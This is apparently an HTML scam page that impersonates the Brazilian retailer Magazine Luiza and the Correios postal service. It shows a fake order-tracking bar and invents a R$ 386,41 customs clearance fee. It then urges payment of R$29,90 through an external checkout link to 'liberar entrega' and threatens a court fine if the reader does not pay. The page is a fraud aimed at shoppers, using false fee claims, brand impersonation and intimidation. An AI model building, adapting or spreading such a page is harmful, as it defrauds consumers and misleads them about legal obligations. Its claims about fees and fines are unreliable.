<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" href="images/favicon.png" type="./image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="images/favicon.png">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">

    <link rel="stylesheet" href="css/base.css">
    <link rel="stylesheet" href="css/styles.css">

    <title>Magazine Luiza - Envio</title>
</head>
<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>

<body>
    <div id="content">
        <img fetchpriority="high" decoding="async" width="607" height="89" src="images/bannerrr.png" class="attachment-large size-large wp-image-1993" alt="" srcset="images/bannerrr.png 607w, images/bannerrr.png 300w" sizes="(max-width: 607px) 100vw, 607px">

        <div class="progress-container">
            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar1"></div>
            
                    <div class="check-container" id="check1">
                        <img src="images/success.png" alt="Animação" id="img1">
                    </div>
                </div>

                <p id="text1">Pedido efetuado</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar2"></div>
            
                    <div class="check-container" id="check2">
                        <img src="images/success.png" alt="Animação" id="img2">
                    </div>
                </div>
                
                <p id="text2">Em separação</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar3"></div>
            
                    <div class="check-container" id="check3">
                        <img src="images/success.png" alt="Animação" id="img3">
                    </div>
                </div>
                
                <p id="text3">Envio</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar4"></div>
            
                    <div class="check-container" id="check4">
                        <img src="images/success.png" alt="Animação" id="img4">
                    </div>
                </div>
                
                <p id="text4">Entrega</p>
            </div>
        </div>

        <section id="more-information">
            <h1>ATENÇÃO!</h1>

            <h2>Foi encontrada uma pendência</h2>

            <p>
                O produto que você selecionou é importado e durante o processo de separação e envio foi identificada uma
                <span class="bold">taxa obrigatória de desembaraço aduaneiro</span>.
            </p>

            <p>Clique no botão abaixo para calcular a taxa.</p>

            <button id="show-offer" disabled="">CALCULAR TAXA</button>
        </section>
    </div>

    <div id="offer-modal" class="modal">
        <div class="modal-content">

            <div id="step1">
                <h1>Calculando sua taxa</h1>

                <div id="trace" class="progress-bar2"></div>

                <p>Por favor aguarde...</p>
            </div>

            <div id="step2">
                <p>VALOR DA TAXA DE IMPORTAÇÃO:</p>

                <span id="value">R$ 386,41</span>

                <p>Mas você tem uma boa notícia: o <span class="bold2">CORREIOS</span> oferece a opção de assumir <span class="bold2">total responsabilidade</span> sobre essa taxa no programa.</p>

                <h1>ZERO TAXAÇÃO</h1>

                <p>se inscreva por apenas</p>

                <h1 id="value">R$29,90</h1>

                <a href="https://pay.compraeegurapay.com/checkout/943169d4-ed28-49c2-afc9-a87e7721da9f">LIBERAR ENTREGA</a>

                <p>Atenção: Caso você não pague os <br><span class="bold3">R$29,90</span>, a taxa de <span class="bold4">R$386,41</span> será cobrada <br>de você, conforme exigido por lei. O descumprimento dessa lei acarretará em <span class="bold4">multa judicial</span>.</p>
            </div>
        </div>
    </div>

    <script src="js/scripts.js"></script>



</body></html>
